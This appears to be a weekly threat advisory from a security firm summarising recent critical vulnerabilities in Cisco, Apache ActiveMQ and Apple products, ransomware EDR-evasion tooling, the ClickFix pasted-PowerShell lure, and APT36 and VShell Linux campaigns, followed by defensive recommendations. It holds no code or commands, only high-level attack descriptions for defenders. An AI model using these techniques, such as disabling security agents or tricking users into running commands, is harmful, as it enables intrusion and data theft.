Attackers Target Core Infrastructure with Stealth and Precision

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Critical Vulnerabilities in Foundational Network and Cloud Infrastructure

This trend highlights attacks on the core software and appliances that manage and secure enterprise networks, offering attackers a powerful foothold.

• Cisco FMC RCE (CVE-2025-20265): A critical, CVSS 10.0 vulnerability in the Firewall Management Center allows unauthenticated remote attackers to execute arbitrary commands with high privileges by sending a crafted RADIUS request, putting entire network security perimeters at risk.
• Apache ActiveMQ Exploit (CVE-2023-46604): Threat actors are actively exploiting this known critical flaw to achieve remote code execution on Linux systems, deploying the DripDropper malware. Uniquely, attackers then patch the vulnerability themselves to prevent rival groups from accessing the compromised system.
• Apple Zero-Day (CVE-2025-43300): A memory corruption flaw in the Image I/O framework affecting iOS, iPadOS, and macOS is being exploited in targeted attacks, potentially allowing remote code execution through a maliciously crafted image file.

2. Evolution of Ransomware Operations with Custom Tooling

Ransomware groups continue to refine their tradecraft, moving beyond encryption to include advanced evasion, data theft, and custom malware designed to disable modern defenses.

• Crypto24 Ransomware: This group employs custom tools like RealBlindingEDR to disable kernel drivers for major EDR/AV solutions (Trend Micro, Kaspersky, SentinelOne) and abuses legitimate uninstallers (XBCUninstaller.exe) to remove security agents. Their operations include keylogging, data exfiltration to Google Drive, and lateral movement before deploying the ransomware payload.

3. Novel Social Engineering and Fileless Execution Techniques

Attackers are developing ingenious methods to bypass technical controls by manipulating users into performing actions that initiate the attack chain, often leaving minimal forensic evidence.

• ClickFix & CORNFLAKE.V3: This technique tricks users into pasting malicious PowerShell commands into the Windows Run dialog after being lured by a fake CAPTCHA or verification page. This user action downloads and executes a powerful backdoor that supports credential theft and secondary payload delivery.

4. Geopolitical Espionage with Cross-Platform Stealth

State-sponsored actors are expanding their toolkits to target diverse operating systems, using stealthy techniques to maintain long-term persistence within victim environments.

• APT36’s .desktop File Attacks: The group targets entities with spear-phishes containing ZIP files. Inside, a .desktop file is disguised as a PDF; when opened, it executes commands to fetch a Go-based implant. The launcher is also configured for autostart persistence, abusing a common Linux UX feature for espionage.
• Linux VShell Backdoor: The payload from the RAR filename campaign is VShell, a feature-rich, Go-based backdoor. It provides full remote control, file exfiltration, and tunneling capabilities, representing a significant threat to Linux-based infrastructure.

Proactive steps for the week 

1. Prioritize Emergency Patching: Immediately apply available patches for critical vulnerabilities, focusing on Cisco FMC (CVE-2025-20265), Apple devices (CVE-2025-43300), and ensure all Apache ActiveMQ instances are fully updated.
2. Enforce Strict Access Controls: Restrict administrative access to critical management interfaces (e.g., FMC, VMware) using network segmentation and firewall rules that only permit connections from trusted, authorized IP ranges.
3. Audit and Harden Authentication: Review and secure RADIUS configurations. Scrutinize Linux PAM modules and SSH settings for unauthorized changes. Enforce phishing-resistant MFA (like number matching) on all cloud and privileged accounts.
4. Monitor for Legitimate Tool Abuse: Implement alerts for the unexpected use of system utilities (e.g., XBCUninstaller.exe, Quick Assist) and the installation of unauthorized Remote Monitoring and Management (RMM) software.
5. Launch Targeted Security Training: Immediately educate users and IT staff on the “ClickFix” technique, training them to never paste commands from unsolicited sources and to be wary of archive attachments (.ZIP, .RAR) from unknown senders.
6. Block High-Risk Network Traffic: Enforce egress filtering and monitor outbound connections to cloud services (Google Drive, Dropbox, WebSockets) for signs of data exfiltration or covert command-and-control activity.